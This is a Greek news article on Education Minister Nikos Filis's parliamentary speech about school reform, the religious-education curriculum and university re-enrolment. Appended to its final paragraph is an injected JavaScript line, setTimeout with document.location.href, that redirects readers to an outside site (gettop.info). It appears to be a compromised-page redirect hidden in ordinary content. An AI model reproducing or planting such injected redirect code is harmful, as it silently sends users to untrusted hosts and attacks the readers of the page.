Φίλης: Στόχος να αναβαθμίσουμε το δημόσιο σχολείο για λόγους λογοδοσίας

0
1

 

Στην ομιλία του στη Βουλή κατά τη συζήτηση της τροπολογίας που αφορούσε την εκπαιδευτική μεταρρύθμιση, ο υπουργός Παιδείας Νίκος Φίλης σημείωσε: «Σήμερα έγινε ένα πρώτο βήμα ότι στο μέλλον μπορεί να υπάρξουν συγκλίσεις, διότι από την ψηφοφορία προκύπτουν συγκλίσεις. Το «παρών» είναι ένα σοβαρό βήμα, που λαμβάνει υπόψιν η κυβέρνηση. Αυτή η σύγκλιση είναι παρακαταθήκη» και τόνισε: «Δεν μας λείπει ο διάλογος, μας λείπει η προδιάθεση της συνεννόησης».

Από τον Σεπτέμβριο, όπως είπε, θα ξεκινήσει πρόγραμμα επιμόρφωσης εκπαιδευτικών για το νέο πρόγραμμα των θρησκευτικών στα σχολεία, ώστε «να είναι μάθημα γνώσης των θρησκειών και όχι μάθημα ομολογιακό».

Νωρίτερα, ο υπουργός είχε επισημάνει: «Έχουμε μεταρρυθμιστική ατζέντα που είναι υπέρ όλων. Στόχος μας είναι να αναβαθμίσουμε το δημόσιο σχολείο, όχι για λόγους ιδεολογικούς, αλλά για λόγους λογοδοσίας απέναντι στην κοινωνία. Το σχολείο θα αποδειχθεί μοχλός επανόρθωσης της κοινωνίας».

Επιπλέον, επανέλαβε ότι οι αλλαγές στην Παιδεία ξεκινούν από κάτω, αναβαθμίζοντας το δημοτικό και το γυμνάσιο. «Με λιγότερα νήπια και προνήπια, έχουμε περισσότερα νηπιαγωγεία φέτος. Μας λέτε κλείνουμε το ολοήμερο. Τα παιδιά και τα τμήματα είναι όσα και πέρυσι».

«Μας λέτε ότι θέλουμε να κλείσουμε το δημοτικό. Θα είναι ενιαίο, δεν θα είναι δύο ταχυτήτων. Η εξοικονόμηση έχει να κάνει με καλύτερη διαχείριση του δυναμικού που έχουμε», τόνισε και ξεκαθάρισε ότι «τα σχολεία θα ανοίξουν είτε με πολιτικές ή παρασυνδικαλιστικές τρικλοποδιές».

Αναφορικά με την τροπολογία που αφορά στα ΑΕΙ, ο κ. Φίλης εξήγησε ότι η ρύθμιση για την επανεγγραφή των φοιτητών που για δυο συνεχή εξάμηνα δεν πήγαν να εγγραφούν, αφορά φοιτητές που για δυο συνεχή εξάμηνα, για οποιoδήποτε λόγο, δεν πήγαν να γραφούν, είναι ενεργοί. «Δεν έχουν διαγραφεί», είπε, «τους δίνουμε τη δυνατότητα να γραφούν στο εξάμηνο τους». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ